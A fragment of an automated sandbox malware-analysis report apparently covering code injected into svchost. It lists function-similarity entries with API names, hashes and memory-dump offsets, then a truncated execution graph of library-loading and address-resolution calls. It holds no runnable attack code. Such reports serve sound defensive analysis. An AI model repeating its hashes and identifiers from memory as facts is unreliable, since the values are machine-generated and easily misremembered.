                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction ID: bfec094555f264a0b7d98c547016e308e13e7614c4bbc8d9648797e08b8f993a
                                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction Fuzzy Hash: 1971BFB2200FC165FB24DB25A94CBAE7691F785B88F542036DD4943B98DE34CD8CC780
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction ID: 5270c7a57c485555bd0944d5c6b2527c50cb0f8da07f7e32649a429db8fe0dda
                                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction Fuzzy Hash: A371C13320078286FB299F25D95CBAEA7B0F788BC4F440036DE8D47B98DE36C6858700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction ID: d39ef9e53f79a69478c55c11a25f549c8514abcac92dcfa917acfc3a9d625a08
                                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction Fuzzy Hash: B251C372608BC162F624DE29B15CB6E7695F385788F452035DE8A03F99CA35CC8DCBC0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction ID: d5b993508868c0797fef197f1fdc53345f539015327a1f6e55c5fb7d7e6507cf
                                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction Fuzzy Hash: 3551C83320878182F676AF29A95CBAE6671F785780F554035DE8F43B99DE3BC885CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID: $ec
                                                                                • API String ID: 1807457897-2734216012
                                                                                • Opcode ID: e4a143ca4120123da4d2f14e02aee1ec5d2bf5d6a13d88a6f2b8b94793a2fa23
                                                                                • Instruction ID: 4878dfde828e92764df612a55c5cd6d0134cde3af5375dc9368588f3de8f3e2b
                                                                                • Opcode Fuzzy Hash: e4a143ca4120123da4d2f14e02aee1ec5d2bf5d6a13d88a6f2b8b94793a2fa23
                                                                                • Instruction Fuzzy Hash: 8051B8B2518AD096F765CF24E04C7ED7BA0F349B8CF645125EA8947789CB78C989CBC0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction ID: d824cbc75c2384e035841bff3ed5c36e7d2a55b3cc11a2bea2ea6dd09101fe9e
                                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction Fuzzy Hash: 51417F63314A8082EB609F25E85C7AEB7B0F79C7D4F854125EE8D87798DB39C582CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: ec
                                                                                • API String ID: 442123175-2323562846
                                                                                • Opcode ID: 41a51caffb26de89bbe0c185f881ee4edcf50a5614ce5641243d2a174bd7e7c3
                                                                                • Instruction ID: bf1a90250f3c464b17e580480435fdfa989de8183093762ee77b067974181db6
                                                                                • Opcode Fuzzy Hash: 41a51caffb26de89bbe0c185f881ee4edcf50a5614ce5641243d2a174bd7e7c3
                                                                                • Instruction Fuzzy Hash: 503181B2710A84A6EB10DF19F48C79DA3A0F758788F845426EA4D87754DF38C99ACB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: ec
                                                                                • API String ID: 442123175-2323562846
                                                                                • Opcode ID: 52c4664a05fe08042f934c792fbe9bb495d98380603adefd8139ce93c4d597c0
                                                                                • Instruction ID: 1fadef942b3970ca4b24e4d6a2d80451d6648de1e2e2293045638923efdec293
                                                                                • Opcode Fuzzy Hash: 52c4664a05fe08042f934c792fbe9bb495d98380603adefd8139ce93c4d597c0
                                                                                • Instruction Fuzzy Hash: 603191B2214B88A6E710DF15F48C78DB760F358784F445021EB4A83754DF38C99AC740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastModuleName
                                                                                • String ID: ec
                                                                                • API String ID: 2776309574-2323562846
                                                                                • Opcode ID: 31f6bd162c74a95353f8a4d922ed4d515b5d77d8aca2042f3fab3af1802124d8
                                                                                • Instruction ID: d168d993fd49575a538b3485fab1f9e80899dd9c557f6eb984fe36cb40928fe8
                                                                                • Opcode Fuzzy Hash: 31f6bd162c74a95353f8a4d922ed4d515b5d77d8aca2042f3fab3af1802124d8
                                                                                • Instruction Fuzzy Hash: CB31A572214FC4A6F760CB15F45C76EB7A4F784798F246125AA8D43B99DB38C988CB80
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Stringtry_get_function
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2588686239-3893581201
                                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction ID: 2eec8832b97ce5dddc9f96510c1e1d03fa11bb635427e488926e31d5f1b70368
                                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction Fuzzy Hash: BE114D76608FC096EB60CB55F44869EB7A0F7C9B84F545126EE8D43B19DF38C884CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Stringtry_get_function
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2588686239-3893581201
                                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction ID: 76f3fda1c0e076ea54b1888dd76f1781767f17886037316c54cc9a4bdc47fdfa
                                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction Fuzzy Hash: BC110836608B8086E760DB16F44879AB7B4F7CDB90F584126EE8D87B59DF39C5918B00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FeaturePresentProcessorcapture_previous_context
                                                                                • String ID: ec
                                                                                • API String ID: 3936158736-2323562846
                                                                                • Opcode ID: 2c65503d1a7aa5e0a471d737d4230fab2683a94c191c491eb449b430685928c9
                                                                                • Instruction ID: 3dda1e6d2f2e0d5a9bc08756b2d68010fd91c136a6ee2c0ede174fc29fbe6eb8
                                                                                • Opcode Fuzzy Hash: 2c65503d1a7aa5e0a471d737d4230fab2683a94c191c491eb449b430685928c9
                                                                                • Instruction Fuzzy Hash: 9A21C0B4604F88A1FA50DB18F85DB9D67A4F78434CF942526ED8E823A1DF7C8989C790
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction ID: 83d254ad15bd7da8e47ab445b5ae9a5b36dcd0e3b3426ae11c97211ee1065dd8
                                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction Fuzzy Hash: 8F113D72208B8492EB618B15F44875E77A4F788B98F585220EE8D07764DF38C995CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction ID: 9ed55283645974109f541bc679ec140e0f31105b7c37283024ae057674955f2c
                                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction Fuzzy Hash: 54110A32218B8482FB658B15E44875EB7A5F788B98F584221DE8D0BB68DF39C595CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 539475747-3084827643
                                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction ID: d1e545a4272dc192b637af96bb301e6b529ab3c4c5422f3250b4f34c5578261d
                                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction Fuzzy Hash: D7F058A6714FC4A2FA05DB51B44CA9D6321FB88B98F486025AE5903B55CE38CDDDD780
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 539475747-3084827643
                                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction ID: 1815965ff7814cc6cd20d994cc4fbc1b0ac2264576af3809f9598a65583bd015
                                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction Fuzzy Hash: F0F05E2771078091FA15AB41F44CB9E6231AB8CB90F985025A95E07B54CE3AC9D6C710
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: November$October
                                                                                • API String ID: 2742660187-1636048786
                                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction ID: 6ecdd8a66092701ee57e02abf057434ec8dfe7975848859ff8bf84ddec529c17
                                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction Fuzzy Hash: 7FE092A3200945D2FA159B51F48CBFC7231EBC4744F699022955D06252CF3ECCC683C0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction ID: ce6e2c2a467f76a46f30b4779cc058eb1d0d6559ab44eb9d1d7f8531b1e16408
                                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction Fuzzy Hash: E1E039A1200EC4B1FE04CB60B80CA9C6222BBC8788F486022E90906255CE38CCDDC780
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction ID: 146cf93f757b0ee81c007e7b4e682ee62a0587f8255a98e15986df7a286fc573
                                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction Fuzzy Hash: ADE0ED63710640D1FA196B55F84DFDE6332AB8C780F9C5126D91E0A395CE3EC9D6CB10
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction ID: a087b1be76e8bdfbc502756469047ea37c6005ab463975bcf2f2fdab51928f63
                                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction Fuzzy Hash: CA216D62604FC492EB11CF5AB40C65EA3A0FB88B98F455121EE8D47B24EF78C98AC740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction ID: 8f1b9d447ad28db45d065f00b2fb590bbea129da44d0c00a51e8468e04c724b6
                                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction Fuzzy Hash: 97215E23605B9086FB118F6AE40C79EF3B0FB88B94F594125EE8D47B64EF79C5968700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction ID: 15f94d5057715e0b58acb08f1f16f99d9bf7d4bb7b57bd560e8eb1a0bd6a5476
                                                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction Fuzzy Hash: DBE032B1A11A48D6F708CBA2E80C74A76E1FB88B09F489024C90907360DF7D88DACB80

                                                                                Execution Graph

                                                                                Execution Coverage:0.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:228
                                                                                Total number of Limit Nodes:5
                                                                                execution_graph 14109 2c06f7b2908 14111 2c06f7b2936 14109->14111 14110 2c06f7b2a2b LoadLibraryA 14110->14111 14111->14110 14112 2c06f7b2aa7 14111->14112 14113 2c06fd4ae0c 14116 2c06fd4ae1b _set_errno_from_matherr 14113->14116 14115 2c06fd4ae55 14116->14115 14117 2c06fd4b840 14116->14117 14120 2c06fd4b3a4 14117->14120 14119 2c06fd4b849 14119->14115 14122 2c06fd4b3b9 try_get_function 14120->14122 14128 2c06fd4b3d3 _set_errno_from_matherr 14122->14128 14140 2c06fd4d608 14122->14140 14123 2c06fd4b3ee 14123->14128 14143 2c06fd4b860 14123->14143 14126 2c06fd4b41f 14130 2c06fd4d608 _set_errno_from_matherr GetProcAddress 14126->14130 14127 2c06fd4b40f 14129 2c06fd4d608 _set_errno_from_matherr GetProcAddress 14127->14129 14128->14119 14131 2c06fd4b416 14129->14131 14132 2c06fd4b427 14130->14132 14147 2c06fd4b8d8 14131->14147 14133 2c06fd4b43d 14132->14133 14134 2c06fd4b42b 14132->14134 14151 2c06fd4af94 14133->14151 14137 2c06fd4d608 _set_errno_from_matherr GetProcAddress 14134->14137 14137->14131 14139 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14139->14128 14155 2c06fd4d2cc 14140->14155 14142 2c06fd4d636 __vcrt_FlsSetValue 14142->14123 14144 2c06fd4b871 _set_errno_from_matherr 14143->14144 14145 2c06fd4b840 _set_errno_from_matherr GetProcAddress 14144->14145 14146 2c06fd4b401 14144->14146 14145->14146 14146->14126 14146->14127 14148 2c06fd4b90f 14147->14148 14149 2c06fd4b8dd Concurrency::details::SchedulerProxy::DeleteThis 14147->14149 14148->14128 14149->14148 14150 2c06fd4b840 _set_errno_from_matherr GetProcAddress 14149->14150 14150->14148 14152 2c06fd4b046 _set_errno_from_matherr 14151->14152 14159 2c06fd4aeec 14152->14159 14154 2c06fd4b05b 14154->14139 14156 2c06fd4d32d 14155->14156 14158 2c06fd4d328 try_get_function 14155->14158 14156->14142 14157 2c06fd4d41e GetProcAddress 14157->14156 14158->14156 14158->14157 14160 2c06fd4af08 14159->14160 14163 2c06fd4b17c 14160->14163 14162 2c06fd4af1e 14162->14154 14164 2c06fd4b1c4 Concurrency::details::SchedulerProxy::DeleteThis 14163->14164 14165 2c06fd4b198 Concurrency::details::SchedulerProxy::DeleteThis 14163->14165 14164->14162 14165->14164 14167 2c06fd4e6e4 14165->14167 14168 2c06fd4e780 14167->14168 14171 2c06fd4e707 14167->14171 14169 2c06fd4e7d3 14168->14169 14172 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14168->14172 14233 2c06fd4e884 14169->14233 14171->14168 14174 2c06fd4e746 14171->14174 14179 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14171->14179 14173 2c06fd4e7a4 14172->14173 14175 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14173->14175 14176 2c06fd4e768 14174->14176 14182 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14174->14182 14177 2c06fd4e7b8 14175->14177 14178 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14176->14178 14181 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14177->14181 14184 2c06fd4e774 14178->14184 14180 2c06fd4e73a 14179->14180 14193 2c06fd50e98 14180->14193 14187 2c06fd4e7c7 14181->14187 14188 2c06fd4e75c 14182->14188 14183 2c06fd4e83e 14189 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14184->14189 14185 2c06fd4e7df 14185->14183 14192 2c06fd4b8d8 GetProcAddress Concurrency::details::SchedulerProxy::DeleteThis 14185->14192 14190 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14187->14190 14221 2c06fd50fa4 14188->14221 14189->14168 14190->14169 14192->14185 14194 2c06fd50ea1 14193->14194 14219 2c06fd50f9c 14193->14219 14195 2c06fd50ebb 14194->14195 14196 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14194->14196 14197 2c06fd50ecd 14195->14197 14199 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14195->14199 14196->14195 14198 2c06fd50edf 14197->14198 14200 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14197->14200 14201 2c06fd50ef1 14198->14201 14202 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14198->14202 14199->14197 14200->14198 14203 2c06fd50f03 14201->14203 14204 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14201->14204 14202->14201 14205 2c06fd50f15 14203->14205 14206 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14203->14206 14204->14203 14207 2c06fd50f27 14205->14207 14208 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14205->14208 14206->14205 14209 2c06fd50f39 14207->14209 14210 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14207->14210 14208->14207 14211 2c06fd50f4b 14209->14211 14212 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14209->14212 14210->14209 14213 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14211->14213 14215 2c06fd50f5d 14211->14215 14212->14211 14213->14215 14214 2c06fd50f72 14217 2c06fd50f87 14214->14217 14218 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14214->14218 14215->14214 14216 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14215->14216 14216->14214 14217->14219 14220 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14217->14220 14218->14217 14219->14174 14220->14219 14222 2c06fd50fa9 14221->14222 14230 2c06fd5100a 14221->14230 14223 2c06fd50fc2 14222->14223 14224 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14222->14224 14225 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14223->14225 14227 2c06fd50fd4 14223->14227 14224->14223 14225->14227 14226 2c06fd50fe6 14229 2c06fd50ff8 14226->14229 14231 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14226->14231 14227->14226 14228 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14227->14228 14228->14226 14229->14230 14232 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14229->14232 14230->14176 14231->14229 14232->14230 14234 2c06fd4e8b4 14233->14234 14235 2c06fd4e889 14233->14235 14234->14185 14235->14234 14239 2c06fd51068 14235->14239 14238 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14238->14234 14240 2c06fd51071 14239->14240 14241 2c06fd4e8ac 14239->14241 14275 2c06fd51010 14240->14275 14241->14238 14244 2c06fd51010 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14245 2c06fd5109a 14244->14245 14246 2c06fd51010 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14245->14246 14247 2c06fd510a8 14246->14247 14248 2c06fd51010 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14247->14248 14249 2c06fd510b6 14248->14249 14250 2c06fd51010 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14249->14250 14251 2c06fd510c5 14250->14251 14252 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14251->14252 14253 2c06fd510d1 14252->14253 14254 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14253->14254 14255 2c06fd510dd 14254->14255 14256 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14255->14256 14257 2c06fd510e9 14256->14257 14258 2c06fd51010 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14257->14258 14259 2c06fd510f7 14258->14259 14260 2c06fd51010 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14259->14260 14261 2c06fd51105 14260->14261 14262 2c06fd51010 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14261->14262 14263 2c06fd51113 14262->14263 14264 2c06fd51010 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14263->14264 14265 2c06fd51121 14264->14265 14266 2c06fd51010 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14265->14266 14267 2c06fd51130 14266->14267 14268 